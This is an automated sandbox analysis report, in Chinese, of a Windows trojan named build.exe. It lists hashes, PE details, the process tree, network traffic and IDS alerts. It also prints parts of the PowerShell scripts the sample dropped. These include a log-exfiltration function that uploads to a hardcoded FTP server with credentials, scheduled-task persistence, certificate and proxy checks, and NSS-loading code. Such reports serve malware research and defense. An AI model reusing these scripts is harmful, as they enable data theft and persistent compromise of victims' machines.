比较分析...

分析任务

分析类型 虚拟机标签 开始时间 结束时间 持续时间
文件 (Windows) win7-sp1-x64-hpdapp03-1 2018-09-19 17:52:20 2018-09-19 17:54:48 148 秒

魔盾分数

10.0

危险的

文件详细信息

文件名 build.exe
文件大小 240640 字节
文件类型 PE32+ executable (console) x86-64, for MS Windows
MD5 1680f107e9578f61355c15329f69eb4b
SHA1 a835433174cc6f081ff13b3e3582aeb303df6534
SHA256 4d749c53b4f28a2e2896f5e2d25db811c3d036605dd657d165b6baa49ae9e705
SHA512 f769aa09c782a8985b0ece4e8e67b2b8afc4ba36a73ee91897efb49360455a96458d7a2dc4dc8ed6c9dad79edd2369395c8271c745aa68e455c8c5c38158a3df
CRC32 A29F9295
Ssdeep 6144:GE9o6C0wMeewgctohHgw9BxUSE9LltYoW5E:G36C0mtoHrxIvW
Yara 登录查看Yara规则
样本下载 提交误报
登录查看威胁特征

运行截图

访问主机纪录 (可点击查询WPING实时安全评级)

直接 IP 安全评级 地理位置
23.23.114.123 美国
91.112.214.182 奥地利

域名解析 (可点击查询WPING实时安全评级)

域名 安全评级 响应
api.ipify.org A 54.243.179.137
CNAME nagano-19599.herokussl.com
A 50.16.248.221
A 50.19.229.252
A 23.21.121.219
A 23.23.114.123
A 54.243.123.39
CNAME elb097307-934924932.us-east-1.elb.amazonaws.com

摘要

登录查看详细行为信息

PE 信息

初始地址 0x140000000
入口地址 0x140003158
声明校验值 0x00000000
实际校验值 0x000407e0
最低操作系统版本要求 6.0
编译时间 2018-09-18 19:30:02
载入哈希 012e200829394c80788807acf5c9390a

PE 数据组成

名称 虚拟地址 虚拟大小 原始数据大小 特征 熵(Entropy)
.text 0x00001000 0x00011778 0x00011800 IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ 6.47
.rdata 0x00013000 0x0000fb02 0x0000fc00 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ 5.05
.data 0x00023000 0x000186ec 0x00017000 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE 7.42
.pdata 0x0003c000 0x00001194 0x00001200 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ 4.98
.gfids 0x0003e000 0x00000104 0x00000200 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ 1.88
.tls 0x0003f000 0x00000009 0x00000200 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE 0.02
.rsrc 0x00040000 0x000001e0 0x00000200 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ 4.70
.reloc 0x00041000 0x00000af8 0x00000c00 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ 5.28

资源

名称 偏移量 大小 语言 子语言 熵(Entropy) 文件类型
RT_MANIFEST 0x00040060 0x0000017d LANG_ENGLISH SUBLANG_ENGLISH_US 4.91 XML 1.0 document text

导入

库: KERNEL32.dll:
0x140013000 SizeofResource
0x140013008 HeapFree
0x140013018 HeapSize
0x140013020 GetLastError
0x140013028 LockResource
0x140013030 HeapReAlloc
0x140013038 RaiseException
0x140013040 LoadResource
0x140013048 FindResourceW
0x140013050 HeapAlloc
0x140013058 DecodePointer
0x140013060 HeapDestroy
0x140013068 DeleteCriticalSection
0x140013070 GetProcessHeap
0x140013078 MultiByteToWideChar
0x140013080 FindResourceExW
0x140013088 FreeConsole
0x140013090 CreateFileW
0x140013098 WriteConsoleW
0x1400130a0 SetStdHandle
0x1400130a8 SetEnvironmentVariableA
0x1400130b0 FreeEnvironmentStringsW
0x1400130b8 WideCharToMultiByte
0x1400130c0 EnterCriticalSection
0x1400130c8 LeaveCriticalSection
0x1400130d0 EncodePointer
0x1400130d8 SetLastError
0x1400130e8 CreateEventW
0x1400130f0 TlsAlloc
0x1400130f8 TlsGetValue
0x140013100 TlsSetValue
0x140013108 TlsFree
0x140013110 GetSystemTimeAsFileTime
0x140013118 GetModuleHandleW
0x140013120 GetProcAddress
0x140013128 CompareStringW
0x140013130 LCMapStringW
0x140013138 GetStringTypeW
0x140013140 GetCPInfo
0x140013148 IsDebuggerPresent
0x140013150 OutputDebugStringW
0x140013158 CloseHandle
0x140013160 SetEvent
0x140013168 ResetEvent
0x140013170 WaitForSingleObjectEx
0x140013178 RtlCaptureContext
0x140013180 RtlLookupFunctionEntry
0x140013188 RtlVirtualUnwind
0x140013190 UnhandledExceptionFilter
0x1400131a0 GetCurrentProcess
0x1400131a8 TerminateProcess
0x1400131b8 GetStartupInfoW
0x1400131c0 QueryPerformanceCounter
0x1400131c8 GetCurrentProcessId
0x1400131d0 GetCurrentThreadId
0x1400131d8 InitializeSListHead
0x1400131e0 RtlPcToFileHeader
0x1400131e8 RtlUnwindEx
0x1400131f0 FreeLibrary
0x1400131f8 LoadLibraryExW
0x140013200 ExitProcess
0x140013208 GetModuleHandleExW
0x140013210 GetModuleFileNameA
0x140013218 GetStdHandle
0x140013220 WriteFile
0x140013228 GetCommandLineA
0x140013230 GetCommandLineW
0x140013238 GetACP
0x140013240 GetFileType
0x140013248 FlushFileBuffers
0x140013250 GetConsoleCP
0x140013258 GetConsoleMode
0x140013260 SetFilePointerEx
0x140013268 FindClose
0x140013270 FindFirstFileExA
0x140013278 FindNextFileA
0x140013280 IsValidCodePage
0x140013288 GetOEMCP
0x140013290 GetEnvironmentStringsW
库: ole32.dll:
0x1400132b0 CoUninitialize
0x1400132b8 CLSIDFromProgID
0x1400132c0 CoCreateInstance
0x1400132c8 CoInitializeEx
库: OLEAUT32.dll:
0x1400132a0 SysAllocString
t\cRich~t\c
.text
`.rdata
@.data
.pdata
@.gfids
@.tls
.rsrc
@.reloc
bad allocation
address family not supported
address in use
address not available
already connected
argument list too long
argument out of domain
bad address
bad file descriptor
bad message
broken pipe
connection aborted
connection already in progress
connection refused
connection reset
cross device link
destination address required
device or resource busy
directory not empty
executable format error
file exists
file too large
filename too long
function not supported
host unreachable
identifier removed
illegal byte sequence
inappropriate io control operation
interrupted
invalid argument
invalid seek
io error
is a directory
message size
network down
network reset
network unreachable
no buffer space
no child process
no link
no lock available
no message available
no message
no protocol option
no space on device
no stream resources
no such device or address
no such device
no such file or directory
no such process
not a directory
not a socket
not a stream
not connected
not enough memory
not supported
operation canceled
operation in progress
operation not permitted
operation not supported
operation would block
owner dead
permission denied
protocol error
protocol not supported
read only file system
resource deadlock would occur
resource unavailable try again
result out of range
state not recoverable
stream timeout
text file busy
timed out
too many files open in system
too many files open
too many links
too many symbolic link levels
value too large
wrong protocol type
FlsAlloc
FlsFree
FlsGetValue
FlsSetValue
InitializeCriticalSectionEx
InitOnceExecuteOnce
CreateEventExW
CreateSemaphoreW
CreateSemaphoreExW
CreateThreadpoolTimer
SetThreadpoolTimer
WaitForThreadpoolTimerCallbacks
CloseThreadpoolTimer
CreateThreadpoolWait
SetThreadpoolWait
CloseThreadpoolWait
FlushProcessWriteBuffers
FreeLibraryWhenCallbackReturns
GetCurrentProcessorNumber
CreateSymbolicLinkW
GetCurrentPackageId
GetTickCount64
GetFileInformationByHandleEx
SetFileInformationByHandle
GetSystemTimePreciseAsFileTime
InitializeConditionVariable
WakeConditionVariable
WakeAllConditionVariable
SleepConditionVariableCS
InitializeSRWLock
AcquireSRWLockExclusive
TryAcquireSRWLockExclusive
ReleaseSRWLockExclusive
SleepConditionVariableSRW
CreateThreadpoolWork
SubmitThreadpoolWork
CloseThreadpoolWork
CompareStringEx
GetLocaleInfoEx
LCMapStringEx
0123456789abcdefghijklmnopqrstuvwxyz
0123456789abcdefghijklmnopqrstuvwxyz
bad array new length
bad exception
__based(
__cdecl
__pascal
__stdcall
__thiscall
__fastcall
__vectorcall
__clrcall
__eabi
__ptr64
__restrict
__unaligned
restrict(
delete
operator
`vftable'
`vbtable'
`vcall'
`typeof'
`local static guard'
`string'
`vbase destructor'
`vector deleting destructor'
`default constructor closure'
`scalar deleting destructor'
`vector constructor iterator'
`vector destructor iterator'
`vector vbase constructor iterator'
`virtual displacement map'
`eh vector constructor iterator'
`eh vector destructor iterator'
`eh vector vbase constructor iterator'
`copy constructor closure'
`udt returning'
`RTTI
`local vftable'
`local vftable constructor closure'
new[]
delete[]
`omni callsig'
`placement delete closure'
`placement delete[] closure'
`managed vector constructor iterator'
`managed vector destructor iterator'
`eh vector copy constructor iterator'
`eh vector vbase copy constructor iterator'
`dynamic initializer for '
`dynamic atexit destructor for '
`vector copy constructor iterator'
`vector vbase copy constructor iterator'
`managed vector copy constructor iterator'
`local static thread guard'
operator ""
Type Descriptor'
Base Class Descriptor at (
Base Class Array'
Class Hierarchy Descriptor'
Complete Object Locator'
CorExitProcess
LocaleNameToLCID
Sunday
Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
January
February
March
April
August
September
October
November
December
MM/dd/yy
dddd, MMMM dd, yyyy
HH:mm:ss
log10
9>powf
>Unknown exception
.text$di
.text$mn
.text$mn$00
.text$x
.text$yd
.idata$5
.00cfg
.CRT$XCA
.CRT$XCAA
.CRT$XCC
.CRT$XCL
.CRT$XCZ
.CRT$XIA
.CRT$XIAA
.CRT$XIAC
.CRT$XIC
.CRT$XIZ
.CRT$XLA
.CRT$XLZ
.CRT$XPA
.CRT$XPX
.CRT$XPXA
.CRT$XPZ
.CRT$XTA
.CRT$XTZ
.rdata
.rdata$T
.rdata$r
.rdata$zzzdbg
.rtc$IAA
.rtc$IZZ
.rtc$TAA
.rtc$TZZ
.xdata
.xdata$x
.idata$2
.idata$3
.idata$4
.idata$6
.data
.data$r
.pdata
.gfids$x
.gfids$y
.tls$
.tls$ZZZ
.rsrc$01
.rsrc$02
kernel32.dll
es-ve
et-ee
eu-es
fa-ir
fi-fi
fo-fo
fr-be
fr-ca
fr-ch
fr-fr
fr-lu
fr-mc
gl-es
gu-in
he-il
hi-in
hr-ba
hr-hr
hu-hu
hy-am
id-id
is-is
it-ch
it-it
ja-jp
ka-ge
kk-kz
kn-in
ko-kr
kok-in
ky-kg
lt-lt
lv-lv
mi-nz
mk-mk
ml-in
mn-mn
mr-in
ms-bn
ms-my
mt-mt
nb-no
nl-be
nl-nl
nn-no
ns-za
pa-in
pl-pl
pt-br
pt-pt
quz-bo
quz-ec
quz-pe
ro-ro
ru-ru
sa-in
se-fi
se-no
se-se
sk-sk
sl-si
sma-no
sma-se
smj-no
smj-se
smn-fi
sms-fi
sq-al
sr-ba-cyrl
sr-ba-latn
sr-sp-cyrl
sr-sp-latn
sv-fi
sv-se
sw-ke
syr-sy
ta-in
te-in
th-th
tn-za
tr-tr
tt-ru
uk-ua
ur-pk
uz-uz-cyrl
uz-uz-latn
vi-vn
xh-za
zh-chs
zh-cht
zh-cn
zh-hk
zh-mo
zh-sg
zh-tw
zu-za
zh-CHS
ar-SA
bg-BG
ca-ES
zh-TW
cs-CZ
da-DK
de-DE
el-GR
en-US
fi-FI
fr-FR
he-IL
hu-HU
is-IS
it-IT
ja-JP
ko-KR
nl-NL
nb-NO
pl-PL
pt-BR
ro-RO
ru-RU
hr-HR
sk-SK
sq-AL
sv-SE
th-TH
tr-TR
ur-PK
id-ID
uk-UA
be-BY
sl-SI
et-EE
lv-LV
lt-LT
fa-IR
vi-VN
hy-AM
az-AZ-Latn
eu-ES
mk-MK
tn-ZA
xh-ZA
zu-ZA
af-ZA
ka-GE
fo-FO
hi-IN
mt-MT
se-NO
ms-MY
kk-KZ
ky-KG
sw-KE
uz-UZ-Latn
tt-RU
bn-IN
pa-IN
gu-IN
ta-IN
te-IN
kn-IN
ml-IN
mr-IN
sa-IN
mn-MN
cy-GB
gl-ES
kok-IN
syr-SY
div-MV
quz-BO
ns-ZA
mi-NZ
ar-IQ
zh-CN
de-CH
en-GB
es-MX
fr-BE
it-CH
nl-BE
nn-NO
pt-PT
sr-SP-Latn
sv-FI
az-AZ-Cyrl
se-SE
ms-BN
uz-UZ-Cyrl
quz-EC
ar-EG
zh-HK
de-AT
en-AU
es-ES
fr-CA
sr-SP-Cyrl
se-FI
quz-PE
ar-LY
zh-SG
de-LU
en-CA
es-GT
fr-CH
hr-BA
smj-NO
ar-DZ
zh-MO
de-LI
en-NZ
es-CR
fr-LU
bs-BA-Latn
smj-SE
ar-MA
en-IE
es-PA
fr-MC
sr-BA-Latn
sma-NO
ar-TN
en-ZA
es-DO
sr-BA-Cyrl
sma-SE
ar-OM
en-JM
es-VE
sms-FI
ar-YE
en-CB
es-CO
smn-FI
ar-SY
en-BZ
es-PE
ar-JO
en-TT
es-AR
ar-LB
en-ZW
es-EC
ar-KW
en-PH
es-CL
ar-AE
es-UY
ar-BH
es-PY
ar-QA
es-BO
es-SV
es-HN
es-NI
es-PR
zh-CHT
af-za
ar-ae
ar-bh
ar-dz
ar-eg
ar-iq
ar-jo
ar-kw
ar-lb
ar-ly
ar-ma
ar-om
ar-qa
ar-sa
ar-sy
ar-tn
ar-ye
az-az-cyrl
az-az-latn
be-by
bg-bg
bn-in
bs-ba-latn
ca-es
cs-cz
cy-gb
da-dk
de-at
de-ch
de-de
de-li
de-lu
div-mv
el-gr
en-au
en-bz
en-ca
en-cb
en-gb
en-ie
en-jm
en-nz
en-ph
en-tt
en-us
en-za
en-zw
es-ar
es-bo
es-cl
es-co
es-cr
es-do
es-ec
es-es
es-gt
es-hn
es-mx
es-ni
es-pa
es-pe
es-pr
es-py
es-sv
es-uy
advapi32
api-ms-win-core-fibers-l1-1-1
api-ms-win-core-synch-l1-2-0
kernel32
mscoree.dll
api-ms-win-appmodel-runtime-l1-1-1
api-ms-win-core-datetime-l1-1-1
api-ms-win-core-file-l2-1-1
api-ms-win-core-localization-l1-2-1
api-ms-win-core-localization-obsolete-l1-2-0
api-ms-win-core-processthreads-l1-1-2
api-ms-win-core-string-l1-1-0
api-ms-win-core-sysinfo-l1-2-1
api-ms-win-core-winrt-l1-1-0
api-ms-win-core-xstate-l2-1-0
api-ms-win-rtcore-ntuser-window-l1-1-0
api-ms-win-security-systemfunctions-l1-1-0
ext-ms-win-kernel32-package-current-l1-1-0
ext-ms-win-ntuser-dialogbox-l1-1-0
ext-ms-win-ntuser-windowstation-l1-1-0
user32
Sunday
Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
January
February
March
April
August
September
October
November
December
MM/dd/yy
dddd, MMMM dd, yyyy
HH:mm:ss
CONOUT$
没有防病毒引擎扫描信息!

进程树

build.exe, PID: 2516, 上一级进程 PID: 2380
cmd.exe, PID: 2756, 上一级进程 PID: 2516
taskkill.exe, PID: 2836, 上一级进程 PID: 2516
taskkill.exe, PID: 2868, 上一级进程 PID: 2516
taskkill.exe, PID: 2952, 上一级进程 PID: 2516
cmd.exe, PID: 1564, 上一级进程 PID: 2516
cmd.exe, PID: 2564, 上一级进程 PID: 2516
cmd.exe, PID: 2804, 上一级进程 PID: 2516
cmd.exe, PID: 2924, 上一级进程 PID: 2516
powershell.exe, PID: 1308, 上一级进程 PID: 2516
下载PCAP包

访问主机纪录 (可点击查询WPING实时安全评级)

直接 IP 安全评级 地理位置
23.23.114.123 美国
91.112.214.182 奥地利

TCP

源地址 源端口 目标地址 目标端口
192.168.122.201 49165 23.23.114.123 api.ipify.org 80
192.168.122.201 49166 23.23.114.123 api.ipify.org 80
192.168.122.201 49167 23.23.114.123 api.ipify.org 80
192.168.122.201 49168 23.23.114.123 api.ipify.org 80
192.168.122.201 49169 23.23.114.123 api.ipify.org 80
91.112.214.182 21 192.168.122.201 49178
192.168.122.201 49179 91.112.214.182 37120

UDP

源地址 源端口 目标地址 目标端口
192.168.122.201 61941 192.168.122.1 53

域名解析 (可点击查询WPING实时安全评级)

域名 安全评级 响应
api.ipify.org A 54.243.179.137
CNAME nagano-19599.herokussl.com
A 50.16.248.221
A 50.19.229.252
A 23.21.121.219
A 23.23.114.123
A 54.243.123.39
CNAME elb097307-934924932.us-east-1.elb.amazonaws.com

TCP

源地址 源端口 目标地址 目标端口
192.168.122.201 49165 23.23.114.123 api.ipify.org 80
192.168.122.201 49166 23.23.114.123 api.ipify.org 80
192.168.122.201 49167 23.23.114.123 api.ipify.org 80
192.168.122.201 49168 23.23.114.123 api.ipify.org 80
192.168.122.201 49169 23.23.114.123 api.ipify.org 80
91.112.214.182 21 192.168.122.201 49178
192.168.122.201 49179 91.112.214.182 37120

UDP

源地址 源端口 目标地址 目标端口
192.168.122.201 61941 192.168.122.1 53

HTTP 请求

URI HTTP数据
URL专业沙箱检测 -> http://api.ipify.org/ 
GET / HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
Host: api.ipify.org
Connection: Keep-Alive

SMTP 流量

无SMTP流量.

IRC 流量

无IRC请求.

ICMP 流量

无ICMP流量.

CIF 报告

无 CIF 结果

网络警报

Timestamp Source IP Source Port Destination IP Destination Port Protocol SID Signature Category
2018-09-19 17:52:57.365203+0800 91.112.214.182 21 192.168.122.201 49178 TCP 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
2018-09-19 17:52:47.946077+0800 192.168.122.201 49169 23.23.114.123 80 TCP 2021997 ET POLICY External IP Lookup api.ipify.org Potential Corporate Privacy Violation
2018-09-19 17:52:47.273909+0800 192.168.122.201 49168 23.23.114.123 80 TCP 2021997 ET POLICY External IP Lookup api.ipify.org Potential Corporate Privacy Violation
2018-09-19 17:52:46.312625+0800 192.168.122.201 49166 23.23.114.123 80 TCP 2021997 ET POLICY External IP Lookup api.ipify.org Potential Corporate Privacy Violation
2018-09-19 17:52:45.860509+0800 192.168.122.201 49165 23.23.114.123 80 TCP 2021997 ET POLICY External IP Lookup api.ipify.org Potential Corporate Privacy Violation
2018-09-19 17:52:46.794717+0800 192.168.122.201 49167 23.23.114.123 80 TCP 2021997 ET POLICY External IP Lookup api.ipify.org Potential Corporate Privacy Violation

TLS

No TLS

Suricata HTTP

No Suricata HTTP

未发现网络提取文件
文件名 590aee7bdd69b59b.customDestinations-ms
相关文件
C:\Users\test\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
文件大小 7960 字节
文件类型 data
MD5 7f011366e63a75160f463b4e50fce6e9
SHA1 48243f89da9c5c28f6ca37c22a9f6c7e0ec4eff0
SHA256 cf2b29afd8950689c52611272a3ae15cfb1b966a1081e70d53eeeb15f6006ecf
CRC32 FCC4A063
Ssdeep 96:GWCP9MefqvsqvJCwooWvWCP9MefqvsEHyqvJCwowyMWwz+GHOGplUV+:GR9yooWvR96HnownWwEGL
下载提交魔盾安全分析
文件名 prefs.js
相关文件
C:\Users\test\AppData\Roaming\Mozilla\Firefox\Profiles\i072kp8z.default-1494515848972\prefs.js
文件大小 19320 字节
文件类型 ASCII text, with very long lines, with CRLF, LF line terminators
MD5 86fb36cab2b70a350ebc55764bfdc1ce
SHA1 6bdb6a37333e7e7b1cb6a0e505ec44369c19624a
SHA256 ab8e4b32f032bb11eb7a44d92461bf4306f6d23e8ffa3ca460d074dcf46d4842
CRC32 04794156
Ssdeep 192:VbzmgU5+adaIMC6EMJu6w1tHpQxKRVD5+jzYfY76D1hW3zc7l8z9oaHfivG++:RyX1tJWKH4jkQic3zule9oqfwGx
Yara
  • Detected no presence of any attachment
  • Detected no presence of any image
  • Detected the presence of an or several urls
下载提交魔盾安全分析显示文本 
# Mozilla User Preferences

/* Do not edit this file.
 *
 * If you make changes to this file while the application is running,
 * the changes will be overwritten when the application exits.
 *
 * To make a manual change to preferences, you can visit the URL about:config
 * For more information, see http://www.mozilla.org/unix/customizing.html#prefs
 */

user_pref("app.update.auto", false);
user_pref("app.update.enabled", false);
user_pref("app.update.lastUpdateTime.addon-background-update-timer", 1504369291);
user_pref("app.update.lastUpdateTime.background-update-timer", 1496022491);
user_pref("app.update.lastUpdateTime.blocklist-background-update-timer", 1535765397);
user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 1495632979);
user_pref("app.update.lastUpdateTime.experiments-update-timer", 1494516459);
user_pref("app.update.lastUpdateTime.search-engine-update-timer", 1495633099);
user_pref("app.update.lastUpdateTime.xpi-signature-verification", 1494516821);
user_pref("app.update.service.enabled", false);
user_pref("browser.cache.disk.capacity", 358400);
user_pref("browser.cache.disk.filesystem_reported", 1);
user_pref("browser.cache.disk.smart_size.first_run", false);
user_pref("browser.cache.disk.smart_size.use_old_max", false);
user_pref("browser.cache.disk.smart_size_cached_value", 624640);
user_pref("browser.cache.frecency_experiment", 2);
user_pref("browser.download.importedFromSqlite", true);
user_pref("browser.link.open_newwindow", 2);
user_pref("browser.migrated-sync-button", true);
user_pref("browser.migration.version", 37);
user_pref("browser.newtabpage.enhanced", true);
user_pref("browser.newtabpage.storageVersion", 1);
user_pref("browser.offline-apps.notify", false);
user_pref("browser.pagethumbnails.storage_version", 3);
user_pref("browser.places.smartBookmarksVersion", 7);
user_pref("browser.preferences.advanced.selectedTabIndex", 0);
user_pref("browser.rights.3.shown", true);
user_pref("browser.safebrowsing.enabled", false);
user_pref("brows <truncated>
文件名 4T1URnT.ps1
相关文件
C:\ProgramData\4T1URnT.ps1
文件大小 7840 字节
文件类型 ASCII text, with very long lines
MD5 73641e857a0402982c7c49497988bd1a
SHA1 e3d97e1e93d3abea271f744d6685823822549fd2
SHA256 7f754d568be48a27c1753b782f868eac82b23dd56255b1188ea189168a080073
CRC32 5A275F72
Ssdeep 192:YFehO/hpoSDdyUIwizis3TWwcDJKqxPmQ0AtfouLbmlod0WL:YFeh2YC/Iz5vGgllsd
下载提交魔盾安全分析显示文本 
$SH_TYPE_SCHEDULED_TASK=1;
$SH_TYPE_TASK_SCHEDULER=2;
$schedulerType=$SH_TYPE_SCHEDULED_TASK;
function mBXmzjwCLJY
{
param([string]$zipfile, [string]$destination);
$7z = Join-Path $env:ALLUSERSPROFILE '7za.exe';
if (-NOT (Test-Path $7z)){
Try
{
(New-Object System.Net.WebClient).DownloadFile('https://chocolatey.org/7za.exe',$7z);
}
Catch{}
}
if ($(Try { Test-Path $7z.trim() } Catch { $false })){
Start-Process "$7z" -ArgumentList "x -o`"$destination`" -y `"$zipfile`"" -Wait -NoNewWindow
}
else{
$shell = new-object -com shell.application;
$zip = $shell.NameSpace($zipfile);
foreach($item in $zip.items())
{
$shell.Namespace($destination).copyhere($item);
}
}
}
function Base64ToFile
{
param([string]$file, [string]$string);
$bytes=[System.Convert]::FromBase64String($string);
#set-content -encoding byte $file -value $bytes;
[IO.File]::WriteAllBytes($file, $bytes);
}
function RandomString{
    param([int]$min=5, [int]$max=15);
    return (-join ((48..57)+(65..90)+(97..122) | Get-Random -Count (Get-Random -minimum $min -maximum $max) | % {[char]$_}));
}
function InitScheduller{
    try{
        Import-Module ScheduledTasks -ErrorAction Stop;
        return $SH_TYPE_SCHEDULED_TASK;
    }catch{
        $File=$env:Temp+'\'+(RandomString)+'.zip';
        $Dest=$env:Temp+'\'+(RandomString);
        while (!(uaFSXULxO 'https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg' $File)) {}
        if ((Test-Path $Dest) -eq 1){Remove-Item -Force -Recurse $Dest;}mkdir $Dest | Out-Null;
        mBXmzjwCLJY $File $Dest;
        Remove-Item -Force $File;
        $TSAssembly=$Dest+'\lib\net20\Microsoft.Win32.TaskScheduler.dll';
        $loadLib = [System.Reflection.Assembly]::LoadFile($TSAssembly);
        return $SH_TYPE_TASK_SCHEDULER;
    }
}
function LQFPqwtAc
{
param([string]$name, [string]$cmd, [string]$params='',[int]$restart=0,[int]$delay=0,[string]$dir='');
switch ($schedulerType) {
    $SH_TYPE_SCHEDULED_TASK {
        $Action = New-ScheduledTaskAction -Execute $cmd;
        if(-Not [String]::IsNullOrEmpty($params)){
          <truncated>
文件名 4IKYPwsB.ps1
相关文件
C:\Users\test\AppData\Local\Temp\4IKYPwsB.ps1
文件大小 2954 字节
文件类型 ASCII text
MD5 e846f6d85399752c2e51562b2b1fda1b
SHA1 d5478afcf056a839a3d572f20535d3789bfbc2ba
SHA256 d817e3233e95a5f7f80b4dcc45f121c3b9401ed2ca3ae5fbde168838b4a90ff4
CRC32 FFACF392
Ssdeep 48:8pGE0tr4bGE9ZMpu0oUUqxndOqCRY1hGBQWWW0WfkufCLTi4ukiXKEU:8cEm/GkOqxnoJGhGWZfokuqL+4u9Kp
下载提交魔盾安全分析显示文本 
$Logfile = $env:Temp+"\\$(gc env:computername).log";

Function LogWrite
{
  Param ([string]$logstring)
  $dt=Get-Date -Format "dd.MM.yyyy HH:mm:ss";
  $msg=[string]::Format("[{0}]::[{1}]",$dt,$logstring);
  Write-Host $msg;
  Add-content $Logfile -value $msg;
}
Function UploadLog
{
  $dest = "ftp://Wettbewerb:mantler1220x@91.112.214.182/public_html/log";
  $webclient = New-Object -TypeName System.Net.WebClient;
  $webclient.UploadFile("$dest/$(gc env:computername).log", $Logfile);
  Remove-Item -Path $Logfile;
}
function CheckInstall(){
  $wininfo = (Get-WmiObject Win32_OperatingSystem | Select Caption, ServicePackMajorVersion, OSArchitecture, Version, MUILanguages);
  $wininfo.MUILanguages=$wininfo.MUILanguages -join ",";
  LogWrite("OS info: {0}" -f $wininfo -join "");
  if (test-path variable:psversiontable) {
    $version = $psversiontable.psversion;
  } else {
    $version = [version]"1.0.0.0";
  }
  LogWrite("Powershell version: {0}" -f $version);
  try {
    $pac=Get-ItemProperty 'hkcu:\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\'|Select -expand AutoConfigURL -ErrorAction Stop;
    LogWrite("Pac setted: '$pac'");
  }
  catch {
    LogWrite("ERROR: Pac not setted");
  }
  $Certs = @(Get-ChildItem cert:\CurrentUser\ROOT|Where-Object {$_.Subject -like "*COMODO RSA Extended Validation Secure Server CA 2*" -or $_.Subject -like "*COMODO Certification Authority*"}|ForEach-Object {"{0} ({1})" -f ($_.Thumbprint,$_.NotBefore)});
  if (-NOT $Certs.count -eq 0){
    LogWrite("Certs installed: '{0}'" -f ($Certs -join "; "));
  }else {
    LogWrite("Certs not found");
  }
  try{
    $proc = Get-Process | Where-Object {$_.ProcessName -like "tor*" -or $_.ProcessName -like "socat*"}|Select -Property @{ Name="Out"; Expression={"ID:{0}`nName:{1}`nPath:{2}`n-------------" -f $_.Id,$_.ProcessName,$_.Path}}|Select -expand Out;
    LogWrite("Proccess list:`n{0}" -f ($proc -join "`n"));
  }
  catch {
    LogWrite("ERROR: Can't get proccess list");
  }
  $DestTP=$env:ALLUSERSPROFILE;
  try{
    $dirs=dir($Dest <truncated>
文件名 oSzISqLc.ps1
相关文件
C:\Users\test\AppData\Local\Temp\oSzISqLc.ps1
文件大小 16697 字节
文件类型 ASCII text, with very long lines
MD5 27dd3d6d9cbe3086f9372969ed3eb509
SHA1 b28705456378c643fcd14e2e93d8e3954c7f4cc9
SHA256 342b08694340c66ab5624a1408e2e04fe97a93dd187188bd7849e947e39e5c75
CRC32 E828B8FB
Ssdeep 384:VlVaeQiGvZ8mUx3ILBwuSXGgNm/G7T2Imh6H/HGDifPWBLyxh9bbIEng7y7zNL:8Lmhnln9L
下载提交魔盾安全分析显示文本 
function zmxOnQbNYHfz{
Add-Type @"
using System;
using System.IO;
using Microsoft.Win32;
using System.Runtime.InteropServices;
using System.ComponentModel;

public sealed class AxKPAeUfXdxN
{
	private static volatile AxKPAeUfXdxN UjtfVoGeYlF;
	private static object XVsvCnlNl = new Object();
	public static AxKPAeUfXdxN ElvKLjdGNIXDuNy()
    {
        if (UjtfVoGeYlF == null)
        {
            lock (XVsvCnlNl)
            {
                if (UjtfVoGeYlF == null)
                UjtfVoGeYlF = new AxKPAeUfXdxN();
            }
        }
        return UjtfVoGeYlF;
    }
	
	const int uUamOglyct=0;
    
    [DllImport("kernel32", SetLastError = true, CharSet = CharSet.Ansi)]
    static extern IntPtr LoadLibrary([MarshalAs(UnmanagedType.LPStr)]string lpFileName);

    private static IntPtr HPQiihMcaW(string libPath)
    {
        if (String.IsNullOrEmpty(libPath))
            throw new ArgumentNullException("libPath");

        IntPtr moduleHandle = LoadLibrary(libPath);
        if (moduleHandle == IntPtr.Zero)
        {
            int lasterror = Marshal.GetLastWin32Error();
            System.Console.WriteLine(String.Format("Last error: 0x{0:X}",lasterror));
            Win32Exception innerEx = new Win32Exception(lasterror);
            innerEx.Data.Add("LastWin32Error", lasterror);
            throw new Exception("can't load DLL " + libPath, innerEx);
        }
        return moduleHandle;
    }

    [DllImport("kernel32.dll")]
    public static extern IntPtr GetProcAddress(IntPtr hModule, string procedureName);
	//Constants
    const uint NSS_INIT_READONLY=0x1;
    const uint NSS_INIT_NOCERTDB = 0x2;
    const uint NSS_INIT_NOMODDB = 0x4;
    const uint NSS_INIT_FORCEOPEN = 0x8;
    const uint NSS_INIT_NOROOTINIT = 0x10;
    const uint NSS_INIT_OPTIMIZESPACE = 0x20;
    const uint NSS_INIT_PK11THREADSAFE = 0x40;
    const uint NSS_INIT_PK11RELOAD = 0x80;
    const uint NSS_INIT_NOPK11FINALIZE = 0x100;
    const uint NSS_INIT_RESERVED = 0x200;
    const uint NSS_INIT_COOPERATE = NSS_INIT_PK11THREADSAFE | NSS_I <truncated>
文件名 TEST-PC.log
相关文件
C:\Users\test\AppData\Local\Temp\TEST-PC.log
文件大小 1862 字节
文件类型 ISO-8859 text, with very long lines, with CRLF, LF line terminators
